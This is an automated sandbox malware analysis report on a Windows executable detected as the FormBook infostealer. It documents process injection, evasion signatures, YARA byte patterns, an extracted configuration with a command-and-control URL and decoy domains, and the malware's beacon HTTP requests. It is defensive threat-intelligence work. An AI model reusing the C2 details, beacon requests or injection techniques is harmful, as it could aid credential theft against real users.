Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2022-571-GLS.exe

Overview

General Information

Sample Name:2022-571-GLS.exe
Analysis ID:755996
MD5:6cc14805bbf5e6bfb4daae5c8a61af7e
SHA1:34836f2aa6a4e97705352a50d2a7147c857fea94
SHA256:029d4fe47cb21a8f4e1dbe1863cf43cba6ac777e008b9675d381fda82986196b
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • 2022-571-GLS.exe (PID: 5464 cmdline: C:\Users\user\Desktop\2022-571-GLS.exe MD5: 6CC14805BBF5E6BFB4DAAE5C8A61AF7E)
    • jsqqecy.exe (PID: 1236 cmdline: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up MD5: 07875284CE0A6276F406B25F9E429270)
      • jsqqecy.exe (PID: 1224 cmdline: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up MD5: 07875284CE0A6276F406B25F9E429270)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • netsh.exe (PID: 6140 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • cmd.exe (PID: 4136 cmdline: /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cdlcapitolsolutions.com/b31b/"], "decoy": ["deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip", "dentalinfodomain.com", "hiphoppianyc.com", "pools-62911.com", "supportteam26589.site", "delldaypa.one", "szanody.com", "diaper-basket.art", "ffscollab.com", "freediverconnect.com", "namesbrun.com", "theprimone.top", "lenzolab.com", "cikmas.com", "genyuei-no.space", "hellofstyle.com", "lamagall.com", "hallmarktb.com", "hifebou7.info", "sex5a.finance", "printrynner.com", "powerrestorationllc.com", "hirefiz.com", "uninvitedempire.com", "alpinemaintenance.online", "ppcadshub.com", "looking4.tours", "dirtyhandsmedia.com", "capishe.website", "cachorrospitbull.com", "mythic-authentication.online", "nordingcave.online", "gremep.online", "tryufabetcasino.com", "premiumciso.com", "powerful70s.com", "myminecraftrealm.com", "bssurgery.com", "steel-pcint.com", "iokailyjewelry.com", "barmanon5.pro", "kcrsw.com", "9393xx38.app", "kochen-mit-induktion.com", "indtradors.store", "giaxevn.info", "trungtambaohanhariston.com", "fulili.com", "crgabions.com", "matomekoubou.com", "duaidapduapjdp.site", "invissiblefriends.com", "cy3.space", "idqoft.com", "jamal53153.com", "lemagnetix.com", "anthroaction.com", "uspcff.top", "supplierdir.com", "counterpoint.online", "zarl.tech"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.jsqqecy.exe.1090000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.jsqqecy.exe.1090000.1.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        1.2.jsqqecy.exe.1090000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.jsqqecy.exe.1090000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.jsqqecy.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 19 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 2022-571-GLS.exeReversingLabs: Detection: 30%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDiAvira URL Cloud: Label: malware
          Source: www.cdlcapitolsolutions.com/b31b/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeReversingLabs: Detection: 19%
          Machine Learning detection for sample
          Source: 2022-571-GLS.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeJoe Sandbox ML: detected
          Source: 1.2.jsqqecy.exe.1090000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.jsqqecy.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.jsqqecy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cdlcapitolsolutions.com/b31b/"], "decoy": ["deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip", "dentalinfodomain.com", "hiphoppianyc.com", "pools-62911.com", "supportteam26589.site", "delldaypa.one", "szanody.com", "diaper-basket.art", "ffscollab.com", "freediverconnect.com", "namesbrun.com", "theprimone.top", "lenzolab.com", "cikmas.com", "genyuei-no.space", "hellofstyle.com", "lamagall.com", "hallmarktb.com", "hifebou7.info", "sex5a.finance", "printrynner.com", "powerrestorationllc.com", "hirefiz.com", "uninvitedempire.com", "alpinemaintenance.online", "ppcadshub.com", "looking4.tours", "dirtyhandsmedia.com", "capishe.website", "cachorrospitbull.com", "mythic-authentication.online", "nordingcave.online", "gremep.online", "tryufabetcasino.com", "premiumciso.com", "powerful70s.com", "myminecraftrealm.com", "bssurgery.com", "steel-pcint.com", "iokailyjewelry.com", "barmanon5.pro", "kcrsw.com", "9393xx38.app", "kochen-mit-induktion.com", "indtradors.store", "giaxevn.info", "trungtambaohanhariston.com", "fulili.com", "crgabions.com", "matomekoubou.com", "duaidapduapjdp.site", "invissiblefriends.com", "cy3.space", "idqoft.com", "jamal53153.com", "lemagnetix.com", "anthroaction.com", "uspcff.top", "supplierdir.com", "counterpoint.online", "zarl.tech"]}
          Source: 2022-571-GLS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: netsh.pdb source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD52F3 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD52F3 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.easyentry.vip
          Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.221.114.43 80
          Source: C:\Windows\explorer.exeDomain query: www.cdlcapitolsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.221 80
          Source: C:\Windows\explorer.exeDomain query: www.fulili.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.cdlcapitolsolutions.com/b31b/
          Source: Joe Sandbox ViewASN Name: sun-asnSC sun-asnSC
          Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi HTTP/1.1Host: www.cdlcapitolsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi HTTP/1.1Host: www.easyentry.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi HTTP/1.1Host: www.fulili.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.117.168.233 34.117.168.233
          Source: Joe Sandbox ViewIP Address: 34.117.168.233 34.117.168.233
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Nov 2022 12:17:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 29 Nov 2022 12:17:56 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
          Source: 2022-571-GLS.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 2022-571-GLS.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.364781909.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.317290516.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.347986981.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.cdlcapitolsolutions.com
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi HTTP/1.1Host: www.cdlcapitolsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi HTTP/1.1Host: www.easyentry.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi HTTP/1.1Host: www.fulili.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCAD00 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCB890 GetKeyboardState,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
